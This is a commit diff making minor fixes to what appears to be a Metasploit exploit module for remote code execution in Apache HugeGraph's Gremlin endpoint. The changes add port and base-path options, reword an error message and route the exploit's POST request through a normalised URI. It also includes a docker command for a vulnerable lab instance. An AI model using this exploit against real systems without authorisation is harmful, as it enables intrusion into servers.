Minor fixes

jheysel-r7 · jheysel-r7 · commit d7ae1b5463ad · 2024-07-30T09:19:12.000-07:00
diff --git a/documentation/modules/exploit/linux/http/apache_hugegraph_gremlin_rce.md b/documentation/modules/exploit/linux/http/apache_hugegraph_gremlin_rce.md
@@ -9,7 +9,6 @@ To install a vulnerable instance via docker run the following command:
 docker run -itd --name=graph -p 8080:8080 hugegraph/hugegraph:1.0.0
 ```
 
-
 ## Verification Steps
 
 1. Start msfconsole
diff --git a/modules/exploits/linux/http/apache_hugegraph_gremlin_rce.rb b/modules/exploits/linux/http/apache_hugegraph_gremlin_rce.rb
@@ -43,6 +43,10 @@ def initialize(info = {})
         }
       )
     )
+    register_options([
+      Opt::RPORT(8080),
+      OptString.new('TARGETURI', [true, 'Base path to the Apache HugeGraph web application', '/'])
+    ])
   end
 
   def check
@@ -51,7 +55,7 @@ def check
     })
 
     return CheckCode::Unknown('No response from the vulnerable endpoint /gremlin') unless res
-    return CheckCode::Unknown('The response from the vulnerable endpoint /gremlin was not 200') unless res.code == 200
+    return CheckCode::Unknown("The response from the vulnerable endpoint /gremlin was: #{res.code} (expected: 200)") unless res.code == 200
 
     version = res.get_json_document&.dig('version')
     return CheckCode::Unknown('Unable able to determine the version of Apache HugeGraph') unless version
@@ -86,7 +90,7 @@ def exploit
     }
 
     res = send_request_cgi({
-      'uri' => '/gremlin',
+      'uri' => normalize_uri(target_uri.path, '/gremlin'),
       'method' => 'POST',
       'ctype' => 'application/json',
       'data' => data.to_json

Original file line number	Diff line number	Diff line change
`@@ -43,6 +43,10 @@ def initialize(info = {})`
`43`	`43`	`}`
`44`	`44`	`)`
`45`	`45`	`)`
	`46`	`+ register_options([`
	`47`	`+ Opt::RPORT(8080),`
	`48`	`+ OptString.new('TARGETURI', [true, 'Base path to the Apache HugeGraph web application', '/'])`
	`49`	`+ ])`
`46`	`50`	`end`
`47`	`51`
`48`	`52`	`def check`
`@@ -51,7 +55,7 @@ def check`
`51`	`55`	`})`
`52`	`56`
`53`	`57`	`return CheckCode::Unknown('No response from the vulnerable endpoint /gremlin') unless res`
`54`		`- return CheckCode::Unknown('The response from the vulnerable endpoint /gremlin was not 200') unless res.code == 200`
	`58`	`+ return CheckCode::Unknown("The response from the vulnerable endpoint /gremlin was: #{res.code} (expected: 200)") unless res.code == 200`
`55`	`59`
`56`	`60`	`version = res.get_json_document&.dig('version')`
`57`	`61`	`return CheckCode::Unknown('Unable able to determine the version of Apache HugeGraph') unless version`
`@@ -86,7 +90,7 @@ def exploit`
`86`	`90`	`}`
`87`	`91`
`88`	`92`	`res = send_request_cgi({`
`89`		`- 'uri' => '/gremlin',`
	`93`	`+ 'uri' => normalize_uri(target_uri.path, '/gremlin'),`
`90`	`94`	`'method' => 'POST',`
`91`	`95`	`'ctype' => 'application/json',`
`92`	`96`	`'data' => data.to_json`